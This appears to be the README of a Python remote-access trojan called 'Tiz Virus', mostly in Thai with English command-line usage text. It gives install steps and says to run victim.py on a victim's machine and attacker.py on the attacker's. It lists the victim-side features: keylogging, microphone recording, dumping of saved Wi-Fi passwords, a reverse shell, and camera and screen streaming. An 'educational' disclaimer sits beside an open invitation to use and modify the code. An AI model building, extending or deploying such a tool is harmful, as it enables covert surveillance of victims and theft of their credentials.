python rat
1.0.0
แอปพลิเคชั่นนี้มีวัตถุประสงค์เพื่อการศึกษา ฉันไม่สามารถรับผิดชอบต่อการใช้รหัสของฉันในทางที่ผิด
pip3 install requirements.txt
บน windows คุณสามารถเปิดเหยื่อ_requirements.bat และ/หรือ attacker_requirements.bat ซึ่งดาวน์โหลดข้อกำหนด
ข้อกำหนดในการระวังจะแตกต่างกันสำหรับผู้โจมตีและเหยื่อ
บนคอมพิวเตอร์ของเหยื่อ: python3 victim.py
บนคอมพิวเตอร์ของผู้โจมตี: python3 attacker.py
ฝั่งเหยื่อ:
usage : victim . py [ - h ] [ - - host HOST ] [ - - port PORT ] [ - - keylog KEYLOG ] [ - - micro MICRO ] [ - - wifi WIFI ] [ - - shell SHELL ]
[ - - camera CAMERA ] [ - - screen SCREEN ]
Tiz Virus Victim
optional arguments :
- h , - - help show this help message and exit
- - host HOST listening ip , default is '0.0.0.0' , no need to change
- - port PORT default port is 5000 , revershell = port , camera stream = port + 1 , screen stream = port + 2
- - keylog KEYLOG keylog = t create a keylogger file / keylog = f don ' t create the file
- - micro MICRO micro = 10 record the microphone during 10 sec and put it in a file / micro = 0 don ' t record
- - wifi WIFI wifi = t create a file with all wifis password / wifi = f don ' t create the file
- - shell SHELL shell = t revershell on port ( default = 5000 ) / shell = f don ' t revershell
- - camera CAMERA camera = t stream camera on port + 1 ( default = 5001 ) / camera = f don ' t stream
- - screen SCREEN screen = t stream screen on port + 2 ( default = 5002 ) / screen = f don ' t stream
ฝั่งตัวรุก:
usage : attacker . py [ - h ] [ - - host HOST ] [ - - port PORT ] [ - - shell SHELL ] [ - - camera CAMERA ] [ - - screen SCREEN ]
Tiz Virus Attacker
optional arguments :
- h , - - help show this help message and exit
- - host HOST connecting ip , default is localhost '
- - port PORT default port is 5000 , revershell = port , camera stream = port + 1 , screen stream = port + 2
- - shell SHELL shell = t revershell on port ( default = 5000 ) / shell = f don ' t revershell
- - camera CAMERA camera = t stream camera on port + 1 ( default = 5001 ) / camera = f don ' t stream
- - screen SCREEN screen = t stream screen on port + 2 ( default = 5002 ) / screen = f don ' t stream
ฉันไม่มีใคร ใช้โค้ดนี้ ปรับปรุง แก้ไข คุณไม่จำเป็นต้องอ้างอิงถึงใคร